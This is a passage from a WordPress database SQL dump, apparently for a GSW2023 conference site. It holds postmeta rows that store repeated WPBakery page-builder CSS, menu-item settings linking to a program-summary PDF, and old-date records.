!important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37041,5440,'_wpb_shortcodes_custom_css_updated','1'),
(37042,5441,'_wpb_post_custom_layout','default'),
(37043,5441,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37044,5441,'_wpb_shortcodes_custom_css_updated','1'),
(37045,5442,'_wpb_post_custom_layout','default'),
(37046,5442,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37047,5442,'_wpb_shortcodes_custom_css_updated','1'),
(37048,5443,'_wpb_post_custom_layout','default'),
(37049,5443,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37050,5443,'_wpb_shortcodes_custom_css_updated','1'),
(37051,5444,'_wpb_post_custom_layout','default'),
(37052,5444,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37053,5444,'_wpb_shortcodes_custom_css_updated','1'),
(37054,5445,'_wpb_post_custom_layout','default'),
(37055,5445,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37056,5445,'_wpb_shortcodes_custom_css_updated','1'),
(37060,5448,'_menu_item_type','custom'),
(37061,5448,'_menu_item_menu_item_parent','2084'),
(37062,5448,'_menu_item_object_id','5448'),
(37063,5448,'_menu_item_object','custom'),
(37064,5448,'_menu_item_target','_blank'),
(37065,5448,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(37066,5448,'_menu_item_xfn',''),
(37067,5448,'_menu_item_url','https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-Summary%20-2023-08-31.pdf'),
(37069,2082,'_wp_old_date','2023-08-28'),
(37070,2083,'_wp_old_date','2023-08-28'),
(37071,2346,'_wp_old_date','2023-08-28'),
(37072,2348,'_wp_old_date','2023-08-28'),
(37073,2349,'_wp_old_date','2023-08-28'),
(37074,2350,'_wp_old_date','2023-08-28'),
(37075,2351,'_wp_old_date','2023-08-28'),
(37076,2904,'_wp_old_date','2023-08-28'),
(37077,3556,'_wp_old_date','2023-08-28'),
(37078,4852,'_wp_old_date','2023-08-28'),
(37079,2084,'_wp_old_date','2023-08-28'),
(37080,2352,'_wp_old_date','2023-08-28'),
(37081,5117,'_wp_old_date','2023-08-28'),
(37082,5118,'_wp_old_date','2023-08-28'),
(37083,3671,'_wp_old_date','2023-08-28'),
(37084,5119,'_wp_old_date','2023-08-28'),
(37085,5120,'_wp_old_date','2023-08-28'),
(37086,2281,'_wp_old_date','2023-08-28'),
(37087,2353,'_wp_old_date','2023-08-28'),
(37088,2354,'_wp_old_date','2023-08-28'),
(37089,2355,'_wp_old_date','2023-08-28'),
(37090,2282,'_wp_old_date','2023-08-28'),
(37091,2283,'_wp_old_date','2023-08-28'),
(37092,3645,'_wp_old_date','2023-08-28'),
(37093,2284,'_wp_old_date','2023-08-28'),
(37094,2921,'_wp_old_date','2023-08-28'),
(37095,2285,'_wp_old_date','2023-08-28'),
(37096,5402,'_wp_old_date','2023-08-28'),
(37097,5437,'_wp_old_date','2023-08-28'),
(37098,2356,'_wp_old_date','2023-08-28'),
(37099,2357,'_wp_old_date','2023-08-28'),
(37100,2359,'_wp_old_date','2023-08-28'),
(37101,2358,'_wp_old_date','2023-08-28'),
(37102,2286,'_wp_old_date','2023-08-28'),
(37104,5449,'_wpb_post_custom_layout','default'),
(37105,5449,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37106,5449,'_wpb_shortcodes_custom_css_updated','1'),
(37107,5451,'_wpb_post_custom_layout','default'),
